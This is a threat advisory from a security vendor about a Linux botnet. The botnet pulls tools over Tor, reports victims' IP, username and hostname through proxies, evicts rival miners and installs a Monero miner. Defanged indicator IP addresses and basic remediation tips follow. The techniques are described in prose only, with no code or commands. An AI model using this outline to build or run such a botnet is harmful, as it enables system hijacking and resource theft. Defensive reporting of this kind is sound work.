Rewterz Threat Alert – Formbook Malware – Active IOCs
April 26, 2021Rewterz Threat Advisory – Multiple IBM Spectrum Product Vulnerabilities
April 27, 2021Rewterz Threat Alert – Formbook Malware – Active IOCs
April 26, 2021Rewterz Threat Advisory – Multiple IBM Spectrum Product Vulnerabilities
April 27, 2021Severity
Medium
Analysis Summary
A recently discovered malware botnet is targeting Linux systems by employing emerging techniques such as using Tor proxies, the deactivation or removal of competing malware, and abusing legitimate DevOps tools.
On analysis, it is found that this Linux botnet downloads its needed files from the Tor network, including essential binaries such as ps, as, ss, and curl. Using shell script and Unix system design, the malware is able to perform HTTP requests to get more information on the infected systems.
To commit the attacks, a large network of proxies is maintained by threat actors to establish and maintain connections between the surface web and the Tor network. The proxies also send various identifiable information about the target systems, including:
- IP addresses
- Architecture
- Username
- Hostname
- A part of the uniform resource identifier (URI)
The botnet is currently being used for cryptocurrency mining as the XMRing Monero (XMR) miner is deployed onto the infected machines. The malware searches the system for running miners, uses its own mining tools, and attempts to remove the other miners. The malware only requires the Linux operating system to run and spread.
Impact
- Hacking
- Cryptocurrency Mining
Affected Vendors
Linux
Indicators of Compromise
IP
- 144[.]76[.]110[.]70
- 172[.]104[.]56[.]209
- 178[.]128[.]84[.]253
- 185[.]188[.]183[.]254
- 185[.]35[.]223[.]76
- 201[.]159[.]100[.]58
- 209[.]97[.]174[.]97
- 45[.]32[.]171[.]166
- 46[.]101[.]61[.]9
- 46[.]229[.]55[.]38
- 46[.]229[.]55[.]39
- 51[.]103[.]16[.]14
- 51[.]68[.]214[.]156
- 51[.]75[.]163[.]92
- 51[.]89[.]149[.]71
- 67[.]149[.]39[.]182
- 77[.]120[.]123[.]179
- 77[.]66[.]176[.]9
- 82[.]37[.]194[.]181
- 83[.]217[.]28[.]46
- 85[.]159[.]44[.]163
- 85[.]234[.]143[.]106
- 91[.]194[.]250[.]134
- 92[.]63[.]192[.]7
Remediation
- Use strong and secure passwords.
- Update the latest patches regularly.
- Impose limits on authorized personnel.